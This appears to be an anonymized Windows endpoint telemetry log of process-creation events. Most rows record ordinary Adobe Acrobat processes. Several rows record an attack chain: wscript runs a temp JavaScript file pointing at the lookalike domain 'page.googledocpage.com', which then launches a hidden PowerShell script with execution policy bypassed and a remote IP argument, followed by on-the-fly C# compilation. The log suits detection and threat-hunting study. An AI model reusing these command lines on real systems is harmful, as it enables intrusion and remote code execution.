DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:41:32.403448200+00:00,13388,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-25 00:41:29.156715600+00:00,17944,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:32.646689600+00:00,2021-06-25 00:43:12.884028600+00:00,7764093a-3098-4723-92c0-533c5a3f7273,computerpii_0a470890c60768167990033d701e7bd881398861,181551,False,10.7740.19041.1052,False,11540474045178354,,11540474045178357,2021-06-25 00:41:32.403448200+00:00,13388,2021-06-25 00:41:32.403448200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,13388,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-25 00:41:32.410110800+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1234,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:32.695341+00:00,7492,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1872,5721004115284958596,15409303017527892298,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=14812332258253476250 --mojo-platform-channel-handle=2132 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:41:32.403448200+00:00,13388,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-25 00:41:29.156715600+00:00,17944,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:32.708512800+00:00,2021-06-25 00:43:12.884165200+00:00,f6ab5294-32e9-4a8c-ab3e-ed0a96095194,computerpii_0a470890c60768167990033d701e7bd881398861,181554,False,10.7740.19041.1052,False,11540474045178354,,11540474045178358,2021-06-25 00:41:32.403448200+00:00,13388,2021-06-25 00:41:32.403448200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,13388,16512,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-25 00:41:32.410110800+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1235,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:37.431918200+00:00,5640,FullTrustNotifier.exe,"""FullTrustNotifier.exe"" SetDeviceId did=""fd2d6ee4-7db5-4f8e-92e8-cc9cfc449a55""",PortableExecutable,2020-10-22 07:42:28+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\FullTrustNotifier.exe,218608,5236a3cd1fc50ea204f57c9f66787dc6,79f2749d62da14edd4b797d0af539e996841c237795932c299b847bb7d2cd159,ba01717f097852cd19729f5e3146076d12bcc5c7,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.930630900+00:00,17592,AdobeCollabSync.exe,"""AdobeCollabSync.exe""  --type=collab-renderer --proc=15292",False,2021-06-25 00:39:22.820318500+00:00,15292,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:38.304754200+00:00,2021-06-25 00:43:12.884395600+00:00,93b61196-c369-423c-ae48-ebd4e5e683fb,computerpii_0a470890c60768167990033d701e7bd881398861,181559,False,10.7740.19041.1052,False,11540474045178217,,11540474045178359,2021-06-25 00:39:22.930630900+00:00,17592,2021-06-25 00:39:22.930630900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,17592,2176,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-25 00:39:22.829754+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1236,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:50.167242100+00:00,21224,wscript.exe,"""wscript.exe"" ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 5",PortableExecutable,2019-12-07 09:09:07.254980200+00:00,C:\Windows\System32\wscript.exe,170496,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:33.596717600+00:00,13452,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 1 ",False,2021-06-25 00:39:33.326074+00:00,17496,\Device\HarddiskVolume3\Windows\System32\cmd.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:50.192198500+00:00,2021-06-25 00:43:12.884958300+00:00,32553e55-eaad-4c68-8ceb-7a09c871de53,computerpii_0a470890c60768167990033d701e7bd881398861,181571,False,10.7740.19041.1052,False,11540474045178258,,11540474045178360,2021-06-25 00:39:33.596717600+00:00,13452,2021-06-25 00:39:33.596717600+00:00,\Device\HarddiskVolume3\Windows\System32\wscript.exe,13452,128,ActiveProcessStartkey,C:\Windows\System32,170496,2001-02-26 12:33:54+00:00,2019-12-07 09:09:07.254980200+00:00,2021-06-25 00:39:33.769928600+00:00,2019-12-07 09:09:07.254980200+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host
+1237,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:52.460079900+00:00,9208,dllhost.exe,"""DllHost.exe"" /Processid:{776DBC8D-7347-478C-8D71-791E12EF49D8}",PortableExecutable,2020-10-09 20:47:47.793457100+00:00,C:\Windows\SysWOW64\dllhost.exe,19256,6f3c9485f8f97ac04c8e43ef4463a68c,3ed69caab035258e008efbcf40db305891b40ba02ca2737e20defa7c2d4afaf7,497b8ce238db644b7e1a16b417dbb5bc052a2684,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:52.585106400+00:00,2021-06-25 00:43:12.885264+00:00,bfb95db8-5337-4428-8ada-4e0822e7d6e9,computerpii_0a470890c60768167990033d701e7bd881398861,181577,False,10.7740.19041.1052,False,11540474045136908,,11540474045178361,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+1238,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:52.923514800+00:00,19636,powershell.exe,"""powershell.exe"" -w Hidden -ep Bypass -file ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_4af465eb4ec83ac8e168ff1d34590ffde46406b7.ps1"" Ipv4PII_34efea060f868c5f5bc11a7a04255476d926f4b7/ss 408222891",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:33.596717600+00:00,13452,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_f7583a864cb0132cd077ee8c5fa52169bbfe30f7.js"" page.googledocpage.com/ 1 ",False,2021-06-25 00:39:33.326074+00:00,17496,\Device\HarddiskVolume3\Windows\System32\cmd.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:53.038355800+00:00,2021-06-25 00:43:12.885370300+00:00,275093e5-45cc-46ba-adcd-c15c2167cb7d,computerpii_0a470890c60768167990033d701e7bd881398861,181579,False,10.7740.19041.1052,False,11540474045178258,,11540474045178362,2021-06-25 00:39:33.596717600+00:00,13452,2021-06-25 00:39:33.596717600+00:00,wscript.exe,13452,256,ActiveProcessStartkey,C:\Windows\System32,170496,2001-02-26 12:33:54+00:00,2019-12-07 09:09:07.254980200+00:00,2021-06-25 00:39:33.769928600+00:00,2019-12-07 09:09:07.254980200+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1239,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:53.412101400+00:00,15400,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\rtwuf4to.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:41:52.923514800+00:00,19636,powershell.exe,"""powershell.exe"" -w Hidden -ep Bypass -file ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_4af465eb4ec83ac8e168ff1d34590ffde46406b7.ps1"" Ipv4PII_34efea060f868c5f5bc11a7a04255476d926f4b7/ss 408222891",False,2021-06-25 00:39:33.596717600+00:00,13452,wscript.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:53.587430600+00:00,2021-06-25 00:43:12.886279100+00:00,699ea5ea-5e92-469d-88c2-726cf7dbe490,computerpii_0a470890c60768167990033d701e7bd881398861,181597,False,10.7740.19041.1052,False,11540474045178362,,11540474045178364,2021-06-25 00:41:52.923514800+00:00,19636,2021-06-25 00:41:52.923514800+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,19636,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-25 00:41:52.922603800+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1240,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:53.508965800+00:00,9644,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_43f0081ac3f8c0a224d3f1fb6d6534232402673a.tmp"" ""c:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\FilePII_f0e804a4c5c2e2ce13b50689abcdf56b13065e4b.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:41:53.412101400+00:00,15400,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\rtwuf4to.cmdline""",False,2021-06-25 00:41:52.923514800+00:00,19636,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:53.590277200+00:00,2021-06-25 00:43:12.886325800+00:00,e1794bd8-48db-4c19-884d-b5e22ea9fe76,computerpii_0a470890c60768167990033d701e7bd881398861,181598,False,10.7740.19041.1052,False,11540474045178364,,11540474045178365,2021-06-25 00:41:53.412101400+00:00,15400,2021-06-25 00:41:53.412101400+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,15400,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-25 00:41:53.416742100+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1241,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:51:09.832422600+00:00,16476,AcroCEF.exe,"""AcroCEF.exe"" --slMode",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,d4ebed1bb1cfb00171ce0cf6dbc4039b,f6b88a34e92155a3b9c1cc3aca24c56d62318b3ffb343025318bfdb5367b4e3c,da66d66d18c23a33e78d356b3b5be963c3e32dc9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:51:09.654740+00:00,17796,acrobat_sl.exe,"""Acrobat_sl.exe"" ",False,2021-06-25 00:51:09.416657700+00:00,19296,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:51:09.868503200+00:00,2021-06-25 00:51:41.841601700+00:00,578c1766-ac66-479d-8305-07b7d33d5e07,computerpii_0a470890c60768167990033d701e7bd881398861,181973,False,10.7740.19041.1052,False,11540474045178479,,11540474045178483,2021-06-25 00:51:09.654740+00:00,17796,2021-06-25 00:51:09.654740+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe,17796,18560,TerminateProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,24232,2021-02-02 03:38:39+00:00,2021-02-02 05:49:32+00:00,2021-06-25 00:51:09.656193300+00:00,2021-02-02 05:49:32+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,5.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat,21.1.20135.421056,,AcroSpeedLaunch.exe,Adobe Acrobat SpeedLauncher,,,,,,
+1242,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:51:11.554830300+00:00,17436,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a09952"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a09952""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,323272,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:51:11.591732200+00:00,2021-06-25 00:51:41.842491500+00:00,fc60f8ff-873e-49dc-bec9-d4dab18792ef,computerpii_0a470890c60768167990033d701e7bd881398861,181991,False,10.7740.19041.1052,False,11540474045136991,,11540474045178494,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,AGMService.exe,4496,18688,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 